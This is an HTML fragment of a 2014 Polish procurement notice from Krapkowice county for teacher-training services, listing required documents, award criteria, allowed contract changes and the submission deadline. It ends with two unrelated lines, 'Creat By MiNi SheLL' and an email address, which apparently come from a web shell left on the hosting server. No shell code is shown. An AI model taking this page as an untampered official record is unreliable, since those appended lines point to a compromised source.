<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.1.	formularz ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ,
4.2.	dokument lub dokumenty potwierdzające prawo osób składających podpisy w ofercie do występowania w imieniu wykonawcy i możliwości zawarcia umowy z zamawiającym (np. pełnomocnictwo, odpis z właściwego rejestru, zaświadczenie o wpisie do ewidencji działalności gospodarczej, statut lub rejestr handlowy),
4.3.	stosowne pełnomocnictwo (a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie dokumentu lub gdy nie można w jednoznaczny sposób sprawdzić, czy złożony podpis w ofercie został złożony przez osobę/y do tego umocowane,
4.4.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszystkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu.
2.Zmiany istotnych postanowień umowy mogą dotyczyć:
1)terminu realizacji umowy,
2)warunków i terminów płatności,
3)konieczności wprowadzenia zmian będących następstwem zmian wniosku o dofinansowanie Projektu pn.: Kompleksowe wspomaganie szkół i przedszkoli w zakresie doskonalenia nauczycieli w powiecie krapkowickim,
4)konieczności wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki,
5)zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
6)wystąpienia uzasadnionych zdarzeń losowych po stronie Wykonawcy,
7)wystąpienia obiektywnych przeszkód uniemożliwiających realizację zamówienia lub osiągnięcia jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia,
8)zmian wysokości wynagrodzenia w przypadku powstania lub braku obowiązku odprowadzenia przez Zamawiającego składek na ubezpieczenia społeczne i fundusz pracy do których odprowadzenia zobowiązany jest Zamawiający (pracodawca). 
3.Zmiany, o których mowa w ust. 2 mogą nastąpić jedynie w uzasadnionych przypadkach, w szczególności:
1)w zakresie określonym w ust. 2 pkt 1 i 2 w przypadku: 
a)wystąpienia siły wyższej przez którą strony rozumieją w szczególności katastrofę naturalną, strajk, pożar, eksplozję, wojnę, atak terrorystyczny,
b)przedłużenia procedury przetargowej,
c)uwarunkowań społecznych (protesty, listy, petycje, itp.)
d)zmiany stanu prawnego, 
2)w zakresie określonym w ust. 2 pkt 1 w przypadku przedłużenia terminu realizacji przedmiotu zamówienia z przyczyn nieprzewidzianych i niezależnych od Zamawiającego,
3)w zakresie określonym w ust. 2 pkt 2-7 w przypadku: zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy w szczególności regulacji dot. wykorzystania środków budżetowych,
4)w zakresie określonym w ust. 2 pkt 8 w przypadku wystąpienia konieczności odprowadzenia przez Zamawiającego składek na ubezpieczenia społeczne i fundusz pracy do których odprowadzenia zobowiązany jest Zamawiający (pracodawca)
4.Wnioskujący o zmianę umowy, przedkłada pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatkrapkowicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Krapkowicach
ul. Kilińskiego 1
47-303 Krapkowice
Pok. Nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Krapkowicach
ul. Kilińskiego 1
47-303 Krapkowice
Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com